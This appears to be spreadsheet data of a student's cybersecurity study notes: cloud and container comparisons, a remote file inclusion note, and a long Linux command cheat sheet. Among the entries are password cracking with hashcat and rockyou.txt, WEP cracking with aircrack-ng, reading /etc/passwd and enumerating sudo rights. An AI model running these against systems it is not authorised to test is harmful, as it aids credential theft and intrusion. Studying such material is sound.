  <si>
    <t>Lack of total control</t>
  </si>
  <si>
    <t xml:space="preserve">Since data is held offsite by a company you do not control, you lack the ability to control and customise your data storage set-up. This likely to be an issue for larger businesses who have complex storage needs. </t>
  </si>
  <si>
    <t>Access your data anywhere</t>
  </si>
  <si>
    <t>Since your data is stored remotely you can access it whether you are in Manchester or Madrid.</t>
  </si>
  <si>
    <t>Difficult to migrate</t>
  </si>
  <si>
    <t>Once you’ve signed up and started using one particular cloud storage provider, it is difficult to migrate data to another cloud provider later on.</t>
  </si>
  <si>
    <t>Low cost</t>
  </si>
  <si>
    <t>Cloud storage eliminates the need to pay for software licences and updates since all this is included in one global monthly price.</t>
  </si>
  <si>
    <t>Requires Internet</t>
  </si>
  <si>
    <t xml:space="preserve">If your Internet connection fails, so does your access to remotely stored data. </t>
  </si>
  <si>
    <t xml:space="preserve"> Scalabiliy</t>
  </si>
  <si>
    <t>You only pay for the amount of storage you need. If your business experiences growth, the cloud operator is able to accommodate your corresponding growth in data storage needs.</t>
  </si>
  <si>
    <t>Security and privacy have been an issue</t>
  </si>
  <si>
    <t>Cloud storage means handing over the control of confidential information to a third party company.</t>
  </si>
  <si>
    <t>Professional cloud storage firms typically offer far better data security than is otherwise available to small businesses through efforts of their own.</t>
  </si>
  <si>
    <t>Fixed contracts can be a problem</t>
  </si>
  <si>
    <t>Some cloud storage suppliers may try to fix you into a long term contract. This may be disadvantageous if your data storage needs reduce meaning you must now pay for storage you're not even using.</t>
  </si>
  <si>
    <t>Cloud Service Model</t>
  </si>
  <si>
    <t>Ground-up security:</t>
  </si>
  <si>
    <t>Centralized security management by experienced professionals.
Regular updates and patches to mitigate vulnerabilities.
Access controls and encryption options enhance data protection.</t>
  </si>
  <si>
    <t>Data Security and Privacy:</t>
  </si>
  <si>
    <t>Internet connectivity issues can disrupt access to cloud services.
Cloud outages, though rare, can still occur and impact operations.
Performance can be affected if the connection to the cloud is slow or unstable.</t>
  </si>
  <si>
    <t>Easy configuration:</t>
  </si>
  <si>
    <t>User-friendly interfaces for setting up services and resources.
Templates and automation for streamlined configuration.
Reduced need for deep technical expertise.</t>
  </si>
  <si>
    <t>Vendor Dependence:</t>
  </si>
  <si>
    <t>Reliance on a single cloud provider for services and data storage.
Challenges in migrating between different cloud providers due to compatibility issues and vendor lock-in.</t>
  </si>
  <si>
    <t>Quick turnaround:</t>
  </si>
  <si>
    <t>Rapid deployment of resources and services.
Accelerated software development and testing cycles.
Speedy scaling to handle changes in demand.</t>
  </si>
  <si>
    <t>Downtime and Connectivity Concerns:</t>
  </si>
  <si>
    <t xml:space="preserve">Personalized provisions from cloud providers
</t>
  </si>
  <si>
    <t>Access to a wide range of services and features.
Ability to choose and combine services that best fit specific needs.
Flexibility to adopt new technologies as they become available.</t>
  </si>
  <si>
    <t>Limited Control and Customization:</t>
  </si>
  <si>
    <t>Cloud services might not fully align with specific organizational needs.
Limited customization options for certain services, leading to compromises in functionality.
Inflexibility to make immediate changes to underlying infrastructure or services.</t>
  </si>
  <si>
    <t xml:space="preserve">High availability and fault tolerance
</t>
  </si>
  <si>
    <t>Redundancy and failover mechanisms enhance service reliability.
Geographically distributed data centers minimize downtime risk.
Improved disaster recovery capabilities compared to traditional setups.</t>
  </si>
  <si>
    <t xml:space="preserve">Latency and Performance:
</t>
  </si>
  <si>
    <t>Latency issues can arise when data needs to travel between the user and the cloud data center.
Performance bottlenecks due to shared resources among cloud users, especially during peak usage.</t>
  </si>
  <si>
    <t xml:space="preserve">Easy implementation
</t>
  </si>
  <si>
    <t>Minimal hardware and infrastructure setup required.
Cloud provider handles most operational aspects.
Faster time-to-market for new projects or products.</t>
  </si>
  <si>
    <t>Hidden Costs:</t>
  </si>
  <si>
    <t>Potential compatibility issues with existing on-premises systems.
May lead to vendor lock-in if migration is challenging.</t>
  </si>
  <si>
    <t xml:space="preserve">Affordability
</t>
  </si>
  <si>
    <t>Pay-as-you-go pricing model aligns costs with actual usage.
Eliminates the need for upfront hardware investments.
Scalability allows for cost optimization based on demand.</t>
  </si>
  <si>
    <t>Data Transfer and Bandwidth Costs:</t>
  </si>
  <si>
    <t>Costs associated with transferring large amounts of data to and from the cloud.
High bandwidth usage can lead to increased monthly bills.</t>
  </si>
  <si>
    <t>Containers</t>
  </si>
  <si>
    <t>Lightweight</t>
  </si>
  <si>
    <t>They are much lighter weight than virtual machines because they don't need to virtualize all computer hardware and don’t need to run their own OS.</t>
  </si>
  <si>
    <t>Share Resources</t>
  </si>
  <si>
    <t>Containers intelligently share OS resources while remaining isolated, allowing each one to focus exclusively on its own state.</t>
  </si>
  <si>
    <t>Specialized</t>
  </si>
  <si>
    <t>A container only runs the software components that it needs to complete its task. Containers only do one thing.</t>
  </si>
  <si>
    <t>Easily Duplicated</t>
  </si>
  <si>
    <t>A copy or image of a container can be easily downloaded and shared from computer to computer.</t>
  </si>
  <si>
    <t>Prevalent and Redundant</t>
  </si>
  <si>
    <t>Containers are widely used in today’s web architecture.</t>
  </si>
  <si>
    <t xml:space="preserve">Azure App Service </t>
  </si>
  <si>
    <t xml:space="preserve">Delegation of responsibility
</t>
  </si>
  <si>
    <t>We can pass responsibility for managing features outside of the 
 web application to the cloud service provider.</t>
  </si>
  <si>
    <t xml:space="preserve">Efficiency
</t>
  </si>
  <si>
    <t>Web applications can be deployed much faster, since users don’t have to configure their OS.</t>
  </si>
  <si>
    <t>Maintenance</t>
  </si>
  <si>
    <t>The user doesn't need to maintain the OS and middleware via software updates and patching.</t>
  </si>
  <si>
    <t>Cost</t>
  </si>
  <si>
    <t>Azure app services are cheaper to run than virtual machines.</t>
  </si>
  <si>
    <t>Features</t>
  </si>
  <si>
    <t>Azure App Service has built-in features for securing and hosting a web application, such as DNS, web app firewalls, domain purchasing, and SSL certification binding.</t>
  </si>
  <si>
    <t>Remote file inclusion (RFI)</t>
  </si>
  <si>
    <t xml:space="preserve">Limitations of the RFI attack
</t>
  </si>
  <si>
    <t>To conduct this attack successfully, the web server not only needs to run PHP but also needs to enable a configuration setting to allow external URLs. 
Many web servers that run PHP do not have this configuration enabled.</t>
  </si>
  <si>
    <t xml:space="preserve">Variety of attacks
</t>
  </si>
  <si>
    <t>The demonstration illustrated using one type of malicious script and two command-line commands.
Thousands of malicious scripts can be uploaded, and many malicious commands can be run.
The attack method used the PHP language, but this attack can also be accomplished with other languages, such as ASP.</t>
  </si>
  <si>
    <t>.</t>
  </si>
  <si>
    <t>VM VS Containers</t>
  </si>
  <si>
    <t>VMs</t>
  </si>
  <si>
    <t>Multiple VMs call for multiple, completely separate copies of everything on each machine</t>
  </si>
  <si>
    <t>Multiple containers share common resources, such _x000b_as a kernel and core libraries.</t>
  </si>
  <si>
    <t>VMs and VM images are larger than containers and container images.</t>
  </si>
  <si>
    <t>Containers and container images are smaller than _x000b_VMs and VM images.</t>
  </si>
  <si>
    <t>Recreating VMs takes _x000b_several minutes.</t>
  </si>
  <si>
    <t>Can be quickly destroyed _x000b_and recreated.</t>
  </si>
  <si>
    <t>NSE Scripts vs. Vulnerability Scanning</t>
  </si>
  <si>
    <t>NSE Scripts</t>
  </si>
  <si>
    <t>Vulnerability Scanning</t>
  </si>
  <si>
    <t xml:space="preserve">NSE is not fully comprehensive, meaning many vulnerabilities are not covered.
</t>
  </si>
  <si>
    <t xml:space="preserve">NSE cannot perform a large number of scans simultaneously.
</t>
  </si>
  <si>
    <t xml:space="preserve">NSE is most efficient when performing single host scans.
</t>
  </si>
  <si>
    <t xml:space="preserve">NSE is most useful when doing basic information gathering or enumeration tasks.
</t>
  </si>
  <si>
    <t>Kerberos vs. NTLM</t>
  </si>
  <si>
    <t>Kerberos authentication  is used for domain accounts.</t>
  </si>
  <si>
    <t>NTLM password hashes are not salted, meaning that a random string of characters was not added to the hashed password to further protect it from cracking techniques. - Easy brute forced.</t>
  </si>
  <si>
    <t xml:space="preserve">NTLM authentication is used for local accounts.
</t>
  </si>
  <si>
    <t>Lateral Movement vs Initial Access</t>
  </si>
  <si>
    <t>Lateral Movement</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>Lateral movement requires already having internal network access, as “lateral” movement means moving inside the network. 
Initial access refers only to the initial way that we get access to a machine on the internal network.</t>
  </si>
  <si>
    <t>There’s often a greater number of possibilities for code execution when performing lateral movement. 
Within an internal network, network firewall rules seldom apply, and internally networked machines often have greater access to ports to other machines on the network.</t>
  </si>
  <si>
    <t>Command</t>
  </si>
  <si>
    <t>Example</t>
  </si>
  <si>
    <t>Notes:</t>
  </si>
  <si>
    <t>Resets databases for sh file</t>
  </si>
  <si>
    <t>./reset_databases.sh</t>
  </si>
  <si>
    <t>wildcard</t>
  </si>
  <si>
    <t>*</t>
  </si>
  <si>
    <t>Edit John's wordlist here</t>
  </si>
  <si>
    <t>/etc/john/john.conf</t>
  </si>
  <si>
    <t>Remote bash header</t>
  </si>
  <si>
    <t>#!/usr/bin/env bash</t>
  </si>
  <si>
    <t>Saving data to file from command</t>
  </si>
  <si>
    <t>&gt;</t>
  </si>
  <si>
    <t>Home Variable</t>
  </si>
  <si>
    <t>$HOME</t>
  </si>
  <si>
    <t>echo $HOME</t>
  </si>
  <si>
    <t>shows home dir</t>
  </si>
  <si>
    <t>HOST Variable</t>
  </si>
  <si>
    <t>$HOSTNAME</t>
  </si>
  <si>
    <t>echo</t>
  </si>
  <si>
    <t>Shows Machine Name</t>
  </si>
  <si>
    <t>User Variable</t>
  </si>
  <si>
    <t>$USER</t>
  </si>
  <si>
    <t>echo $USER</t>
  </si>
  <si>
    <t>shows user logged in</t>
  </si>
  <si>
    <t>Creates variable for command</t>
  </si>
  <si>
    <t>$VARIABLENAME='COMMAND'</t>
  </si>
  <si>
    <t>pass='cat /etc/passwd'</t>
  </si>
  <si>
    <t>cron syntax for removing all files in the `/Downloads directory @ 11pm</t>
  </si>
  <si>
    <t>0 23 * * 6 rm /DIR/*</t>
  </si>
  <si>
    <t>0 23 * * 6 rm ~/Downloads/*</t>
  </si>
  <si>
    <t>cron syntax for Backup user directoris every Sunday @ 2:36am</t>
  </si>
  <si>
    <t>36 2 * * 0 tar -zcf /var/backups/home.tgz /DIR</t>
  </si>
  <si>
    <t>36 2 * * 0 tar -zcf /var/backups/home.tgz /home</t>
  </si>
  <si>
    <t>WEP Aircrack-ng syntax</t>
  </si>
  <si>
    <t>aircrack-ng FILENAME.pcap</t>
  </si>
  <si>
    <t>aircrack-ng WEP.pcap</t>
  </si>
  <si>
    <t>Syntax to reveal all alias'</t>
  </si>
  <si>
    <t>alias -p</t>
  </si>
  <si>
    <t>alias  syntax</t>
  </si>
  <si>
    <t xml:space="preserve">alias ALIASNAME='COMMMAND'
</t>
  </si>
  <si>
    <t xml:space="preserve">alias lh='ls -lah'
</t>
  </si>
  <si>
    <t>FTP server check whether it supports anonymous logins.</t>
  </si>
  <si>
    <t>anonymous</t>
  </si>
  <si>
    <t>Reinstalls Package</t>
  </si>
  <si>
    <t>apt reinstall PACKAGENAME</t>
  </si>
  <si>
    <t>apt reinstall lynis</t>
  </si>
  <si>
    <t>Updates Package</t>
  </si>
  <si>
    <t>apt update PACKAGENAME</t>
  </si>
  <si>
    <t>apt update lynis</t>
  </si>
  <si>
    <t>Autoremoves packages and purges old config files</t>
  </si>
  <si>
    <t>apt-get autoremove --purge</t>
  </si>
  <si>
    <t>Updates all installed</t>
  </si>
  <si>
    <t>apt-get update</t>
  </si>
  <si>
    <t>Upgrades any installed packages</t>
  </si>
  <si>
    <t>apt-get upgrade</t>
  </si>
  <si>
    <t>awc command with ", " as deliminater</t>
  </si>
  <si>
    <t>awk -F, '{print$(field_number)}'</t>
  </si>
  <si>
    <t>awk -F, '{print$1)}'</t>
  </si>
  <si>
    <t>Delimeter seperated by space using awk</t>
  </si>
  <si>
    <t>awk -F"" '{print $2, $1}' FILENAME</t>
  </si>
  <si>
    <t>awk -F"" '{print $2, $1} dogs.txt</t>
  </si>
  <si>
    <t>"" = space and $=order/variable</t>
  </si>
  <si>
    <t>prints the second field using awk</t>
  </si>
  <si>
    <t>awk -F"/" '{print $2}' FILENAME</t>
  </si>
  <si>
    <t>{print $2, $3}'</t>
  </si>
  <si>
    <t>manually run bash script without bash shell</t>
  </si>
  <si>
    <t>bash SCRIPTNAME</t>
  </si>
  <si>
    <t>bash my_script</t>
  </si>
  <si>
    <t>Displays line numbers of a file</t>
  </si>
  <si>
    <t xml:space="preserve">cat -n 10 FILENAME or cat -10 FILENAME </t>
  </si>
  <si>
    <t>cat -n 10 example.txt or cat -10 example.txt</t>
  </si>
  <si>
    <t>Supresses repeated empty output lines</t>
  </si>
  <si>
    <t>cat -s</t>
  </si>
  <si>
    <t>Browse all groups</t>
  </si>
  <si>
    <t>cat etc/group</t>
  </si>
  <si>
    <t>Outputs a file using CLI</t>
  </si>
  <si>
    <t>cat FILENAME</t>
  </si>
  <si>
    <t>cat example.txt</t>
  </si>
  <si>
    <t>Combines multiple files into one output previe</t>
  </si>
  <si>
    <t>cat FILENAME FILENAME</t>
  </si>
  <si>
    <t xml:space="preserve">Combines multiple files and saves results </t>
  </si>
  <si>
    <t>cat FILENAME FILENAME &gt; NEWFILENAME</t>
  </si>
  <si>
    <t>cat test1 test2 &gt; All_Tests</t>
  </si>
  <si>
    <t xml:space="preserve">Appends multiple files and saves results </t>
  </si>
  <si>
    <t>cat FILENAME FILENAME &gt;&gt; NEWFILENAME</t>
  </si>
  <si>
    <t>cat test1 test2 &gt;&gt; All_Tests</t>
  </si>
  <si>
    <t>Combine all files in the Files folder into a single file called MySummary.txt</t>
  </si>
  <si>
    <t>cat Files/*.txt &gt; Example.txt</t>
  </si>
  <si>
    <t>cat Files/*.txt &gt; MySummary.txt</t>
  </si>
  <si>
    <t>Previews the contents of the encrypted file</t>
  </si>
  <si>
    <t>cat plainmessage.txt.enc</t>
  </si>
  <si>
    <t>Go back a directory</t>
  </si>
  <si>
    <t>cd ..</t>
  </si>
  <si>
    <t>Navigate into a directory (Change Directory).</t>
  </si>
  <si>
    <t>cd /usr/home</t>
  </si>
  <si>
    <t>Change permission info</t>
  </si>
  <si>
    <t>chmod</t>
  </si>
  <si>
    <t xml:space="preserve">Removes script execution </t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">chmod -x </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>FILENAME.sh</t>
    </r>
  </si>
  <si>
    <t>Make shell script executable</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">chmod +x </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>FILENAME.sh</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">chmod +x </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>example.sh</t>
    </r>
  </si>
  <si>
    <t>Change owner and group of a file.</t>
  </si>
  <si>
    <t>chown</t>
  </si>
  <si>
    <t>Clear terminal history</t>
  </si>
  <si>
    <t>clear</t>
  </si>
  <si>
    <t>; argument to combine back to back commands.</t>
  </si>
  <si>
    <t>COMMAND; COMMAND; .... so on</t>
  </si>
  <si>
    <t>mkdir dir ; cd dor; touch file; ls -l</t>
  </si>
  <si>
    <t>Copy's a file  to the current directory</t>
  </si>
  <si>
    <t>cp SOURCEDIR/FILENAME.txt DESTINATIONDIR</t>
  </si>
  <si>
    <t>cp home/example home/test/example</t>
  </si>
  <si>
    <t>editting current signed in user crontab</t>
  </si>
  <si>
    <t>crontab -e</t>
  </si>
  <si>
    <t>listing contents of current signed in user crontab</t>
  </si>
  <si>
    <t>crontab -l</t>
  </si>
  <si>
    <t>Curl extracts lines of website html</t>
  </si>
  <si>
    <t>curl  WEBSITEURL</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">curl  </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://posthere.io</t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>Curl extracts top 10 lines of website html</t>
  </si>
  <si>
    <t xml:space="preserve">curl --head WEBSITEURL
</t>
  </si>
  <si>
    <t xml:space="preserve">curl --head https://posthere.io
</t>
  </si>
  <si>
    <t>Curl request that posts JSON data to url</t>
  </si>
  <si>
    <t>curl -X POST -d "{\"jsonKey1\": \"jsonValue1\", \"jsonKey2\": \"jsonValue2\"}" -H "Content-Type: application/json" WEBSITEURL</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">curl -X POST -d "{\"jsonKey1\": \"jsonValue1\", \"jsonKey2\": \"jsonValue2\"}" -H "Content-Type: application/json" </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://posthere.io/6b5b-4983-9ab3</t>
    </r>
  </si>
  <si>
    <t>-H = Tells server we are sending JSON data.</t>
  </si>
  <si>
    <t>Curl request that posts texts to url</t>
  </si>
  <si>
    <t>curl -X POST -d "TEXT" WEBSITEURL</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">curl -X POST -d "{"Developer":"Andrew"}" </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>http://httpbin.org/anything</t>
    </r>
  </si>
  <si>
    <t>-d = Sends data or message option</t>
  </si>
  <si>
    <t>Curl request that posts to url</t>
  </si>
  <si>
    <t>curl -X POST WEBSITEURL</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
      </rPr>
      <t xml:space="preserve">curl -X POST </t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://posthere.io</t>
    </r>
  </si>
  <si>
    <t>-X= method other than GET</t>
  </si>
  <si>
    <t>Finds out public IP of machine</t>
  </si>
  <si>
    <t>curl icanhazip.com</t>
  </si>
  <si>
    <t>SQL Table Syntax to  delete column if it has a specified  value in column</t>
  </si>
  <si>
    <t>DELETE FROM TABLENAME WHERE COLUMN='VALUE';</t>
  </si>
  <si>
    <t>DELETE FROM employees WHERE email='llatte@goodcorp.net';</t>
  </si>
  <si>
    <t>Using diff command to compare the hashes of two files</t>
  </si>
  <si>
    <t>diff FILENAME SECFILENAME</t>
  </si>
  <si>
    <t>diff Investigation_1101 ../backup/Investigation_1101</t>
  </si>
  <si>
    <t>Check Docker active containers</t>
  </si>
  <si>
    <t>docker container ls</t>
  </si>
  <si>
    <t>Login to db container via docker</t>
  </si>
  <si>
    <t>docker exec -it demo-db bash</t>
  </si>
  <si>
    <t>-it = interactive terminal</t>
  </si>
  <si>
    <t>Signing into MySQL Server to enter database</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <strike/>
        <color theme="1"/>
      </rPr>
      <t>docker</t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve"> mysql -u USERNAME -pPASSWORD</t>
    </r>
  </si>
  <si>
    <t>mysql -u demouser -pdemopass</t>
  </si>
  <si>
    <t>Sign into db container by specifying  DB container for login</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <strike/>
        <color theme="1"/>
      </rPr>
      <t>docker</t>
    </r>
    <r>
      <rPr>
        <rFont val="Source Code Pro"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve"> mysql -u USERNAME -pPASSWORD -D DBNAME</t>
    </r>
  </si>
  <si>
    <t>mysql -u admin -p123456 -D goodcorpdb</t>
  </si>
  <si>
    <t>Clear Docker deployment configurations</t>
  </si>
  <si>
    <t>docker-compose down</t>
  </si>
  <si>
    <t>Deploy stack using docker</t>
  </si>
  <si>
    <t>docker-compose up</t>
  </si>
  <si>
    <t>Command Expansion using echo with new line  break</t>
  </si>
  <si>
    <t>echo -e "CUSTOMTEXT: \n$(COMMAND)"</t>
  </si>
  <si>
    <t>echo -e "The files listed are \n$(ls)"</t>
  </si>
  <si>
    <t>-e and \n produces line break syntax</t>
  </si>
  <si>
    <t>manual entry of alias via CLI</t>
  </si>
  <si>
    <t>echo "alias rr='source ~/.bashrc'" &gt;&gt; ~/.bashrc &amp;&amp; source ~/.bashrc</t>
  </si>
  <si>
    <t>Command Expansion using echo</t>
  </si>
  <si>
    <t>echo "CUSTOMTEXT: $(COMMAND)"</t>
  </si>
  <si>
    <t>echo "The files listed are $(ls)"</t>
  </si>
  <si>
    <t>Prints command of specified variable</t>
  </si>
  <si>
    <t>echo $VARIABLE</t>
  </si>
  <si>
    <t>echo $pass</t>
  </si>
  <si>
    <t>Execute Exiftool</t>
  </si>
  <si>
    <t>exiftool FILENAME</t>
  </si>
  <si>
    <t>exiftool example.jpg</t>
  </si>
  <si>
    <t>Close FTP Client</t>
  </si>
  <si>
    <t>exit or bye</t>
  </si>
  <si>
    <t>Compound command search and verify all text files on machine and prints the last 10 lines.</t>
  </si>
  <si>
    <t>file $(find / -iname *.txt 2&gt;/dev/null) &gt; ~/Desktop/text_files ; tail ~/Desktop/text_files</t>
  </si>
  <si>
    <t>Searches for directory</t>
  </si>
  <si>
    <t>find -type d -iname DIRNAME</t>
  </si>
  <si>
    <t>find -type d -iname log.txt</t>
  </si>
  <si>
    <t>-d = directory</t>
  </si>
  <si>
    <t>Finds all files in our pwd and subdirectories that are .txt</t>
  </si>
  <si>
    <t>find -type f -iname '*.txt'</t>
  </si>
  <si>
    <t>find based on AND conditions</t>
  </si>
  <si>
    <t>find -type f -iname *example* -a -iname *test*</t>
  </si>
  <si>
    <t>find -type f -iname *ball* -a -iname *peanut*</t>
  </si>
  <si>
    <t>-a = AND</t>
  </si>
  <si>
    <t>find based on OR conditions</t>
  </si>
  <si>
    <t>find -type f -iname *example* -o -iname *test*</t>
  </si>
  <si>
    <t>find -type f -iname *ball* -o -iname *peanut*</t>
  </si>
  <si>
    <t>-o = OR</t>
  </si>
  <si>
    <t>Finds all files in our pwd and subdirectories (case insensitive)</t>
  </si>
  <si>
    <t>find -type f -iname FILENAME</t>
  </si>
  <si>
    <t>find -type f -iname log.txt</t>
  </si>
  <si>
    <t>Searches for exact match or specified parameter</t>
  </si>
  <si>
    <t>find -type f -name FILENAME</t>
  </si>
  <si>
    <t>find -type f -name log.txt</t>
  </si>
  <si>
    <t>Finds all files in our pwd and subdirectories (case sensitive)</t>
  </si>
  <si>
    <t>find -type f FILENAME</t>
  </si>
  <si>
    <t>find -type f log.txt</t>
  </si>
  <si>
    <t>-type = required parameter
-f = file search</t>
  </si>
  <si>
    <t>searches for any file in specific dir</t>
  </si>
  <si>
    <t>find /root/desktop -type f -iname FILENAME</t>
  </si>
  <si>
    <t>find /root/desktop -type f -iname 'example.txt'</t>
  </si>
  <si>
    <t>For Loop Syntax</t>
  </si>
  <si>
    <t>for &lt;item&gt; in &lt;list&gt;;
 do
  &lt;command&gt;
done</t>
  </si>
  <si>
    <t>for month in ${months[@];
 do
  if [month = 'Jan']
  then
   echo $months
done</t>
  </si>
  <si>
    <t>For syntax for listing num variable from 0-9</t>
  </si>
  <si>
    <t>for num in {0..9}
 do</t>
  </si>
  <si>
    <t>lists all sudo priveleged users in /home directory</t>
  </si>
  <si>
    <t>for user in $(ls /home);
 do 
  sudo -lU $user;
 done</t>
  </si>
  <si>
    <t>Connect to the target FTP server</t>
  </si>
  <si>
    <t>ftp IPADDRESS</t>
  </si>
  <si>
    <t>ftp 192.168.2.10</t>
  </si>
  <si>
    <t>Download Item</t>
  </si>
  <si>
    <t>get FILENAME</t>
  </si>
  <si>
    <t>get example.txt</t>
  </si>
  <si>
    <t>Outputting the file into GPG encrypted format</t>
  </si>
  <si>
    <t>gpg --armor --output ENCRYPTEDFILENAME.txt --encrypt --recipient UID@email.com PLAINTFILENAME.txt</t>
  </si>
  <si>
    <t>gpg --armor --output Tims_encryptedmessage.txt --encrypt --recipient julie@email.com Tims_plainmessage.txt</t>
  </si>
  <si>
    <t xml:space="preserve">Creating Public Key </t>
  </si>
  <si>
    <t>gpg --armor --output FILENAME.gpg --export USERNAME@email.com</t>
  </si>
  <si>
    <t>gpg --armor --output julie.gpg --export julie@email.com</t>
  </si>
  <si>
    <t>Delete GPG Key</t>
  </si>
  <si>
    <t>gpg --delete-key</t>
  </si>
  <si>
    <t>Delete GPG Secret Key</t>
  </si>
  <si>
    <t>gpg --delete-secret-key</t>
  </si>
  <si>
    <t>GPG Syntax to generate key</t>
  </si>
  <si>
    <t>gpg --gen-key</t>
  </si>
  <si>
    <t>Importing Public Key stored on local machine</t>
  </si>
  <si>
    <t>gpg --import FILENAME.gpg</t>
  </si>
  <si>
    <t>gpg --import julie.gpg</t>
  </si>
  <si>
    <t>GPG Syntax to list gpg keys on system</t>
  </si>
  <si>
    <t>gpg --list-keys</t>
  </si>
  <si>
    <t>Decrypting  Encrypted message to output file</t>
  </si>
  <si>
    <t>gpg --output DECRFILENAME --decrypt ENCFILENAME.txt</t>
  </si>
  <si>
    <t>gpg --output Tims_decrypted_message --decrypt Tims_encryptedmessage.txt</t>
  </si>
  <si>
    <t>Detaching SIgnature over GPG</t>
  </si>
  <si>
    <t>gpg --output SIGNAME --armor --detach-sig FILENAME</t>
  </si>
  <si>
    <t>gpg --output Tims_signature --armor --detach-sig Tims_message.txt</t>
  </si>
  <si>
    <t>Verifying of Signature with file over GPG</t>
  </si>
  <si>
    <t>gpg --verify SIGNAME FILENAME</t>
  </si>
  <si>
    <t>gpg --verify Tims_signature Tims_message.txt</t>
  </si>
  <si>
    <t>Counting all  times example appears in the file.</t>
  </si>
  <si>
    <t>grep -c 'example' FILENAME</t>
  </si>
  <si>
    <t>grep -c 'Mylie Schmidt' Notes_Player_Analysis.txt</t>
  </si>
  <si>
    <t>-c = count</t>
  </si>
  <si>
    <t>Showcases files as an output</t>
  </si>
  <si>
    <t>grep -i</t>
  </si>
  <si>
    <t>-i = case-insensitive</t>
  </si>
  <si>
    <t>Search of word 'example' with wildcard</t>
  </si>
  <si>
    <t>grep -i 'example' *</t>
  </si>
  <si>
    <t>grep -i 'guavaberies' *</t>
  </si>
  <si>
    <t>Pipe can be used to execute another command after the other</t>
  </si>
  <si>
    <t xml:space="preserve">grep -i 'example' * | wc -l &gt;&gt; example_output </t>
  </si>
  <si>
    <t xml:space="preserve">grep -i 'Slugworth' * | wc -l &gt;&gt; example_output </t>
  </si>
  <si>
    <t>execution of OR grep command</t>
  </si>
  <si>
    <t>grep -i 'example\|optional' *</t>
  </si>
  <si>
    <t>grep -i 'guavaberries\|optional' *</t>
  </si>
  <si>
    <t>\| = OR</t>
  </si>
  <si>
    <t>Search  for 'example' data within all txt files  (Case Insensitive)</t>
  </si>
  <si>
    <t>grep -i example *.txt</t>
  </si>
  <si>
    <t>grep -i john *.txt</t>
  </si>
  <si>
    <t>Identifies files keyword is found within.</t>
  </si>
  <si>
    <t>grep -il</t>
  </si>
  <si>
    <t>-il = Only shows file</t>
  </si>
  <si>
    <t>Search  for 'example' data within all txt files within directory</t>
  </si>
  <si>
    <t>grep example *.txt</t>
  </si>
  <si>
    <t>grep john *.txt</t>
  </si>
  <si>
    <t>Search  for 'example' data within example.txt</t>
  </si>
  <si>
    <t>grep example example.txt</t>
  </si>
  <si>
    <t>grep john example.txt</t>
  </si>
  <si>
    <t>Creates group</t>
  </si>
  <si>
    <t>groups NAME</t>
  </si>
  <si>
    <t>groups mike</t>
  </si>
  <si>
    <t>Unzips gzip file</t>
  </si>
  <si>
    <t>gunzip tarFILENAME.tar.gz</t>
  </si>
  <si>
    <t>gunzip 2018-1-15.tar.gz</t>
  </si>
  <si>
    <t>Compresses and zips tar file</t>
  </si>
  <si>
    <t>gzip gzFILENAME.tar</t>
  </si>
  <si>
    <t>gzip 2018-1-15.tar</t>
  </si>
  <si>
    <t>hashcat command to crack password using wordlist</t>
  </si>
  <si>
    <t>hashcat -m 0 -a 0 -o OUTFILENAME hash.txt WORDLIST --force</t>
  </si>
  <si>
    <t>hashcat -m 0 -a 0 -o solved.txt hash.txt rockyou.txt --force</t>
  </si>
  <si>
    <t>-m specifies the hash mode, i.e., LM(3000), NTLM(1000), MD5(0), SHA1(100);
- a specifing method.</t>
  </si>
  <si>
    <t>Previews top number of lines</t>
  </si>
  <si>
    <t>head -10 FILENAME</t>
  </si>
  <si>
    <t>head -n 10 example.txt</t>
  </si>
  <si>
    <t>Reveals history of user activity</t>
  </si>
  <si>
    <t>history</t>
  </si>
  <si>
    <t>Identifies users and groups in a system</t>
  </si>
  <si>
    <t>id</t>
  </si>
  <si>
    <t xml:space="preserve">Get Matching Userid and Groupid </t>
  </si>
  <si>
    <t>id GROUPNAME</t>
  </si>
  <si>
    <t>Checks if directory exists</t>
  </si>
  <si>
    <t>if [(! or =) -d /PATH]</t>
  </si>
  <si>
    <t>-d /home/sysadmin/</t>
  </si>
  <si>
    <t>Checks if file exists</t>
  </si>
  <si>
    <t>if [(! or =) -f /PATH]</t>
  </si>
  <si>
    <t>-f /home/sysadmin/my_file.txt</t>
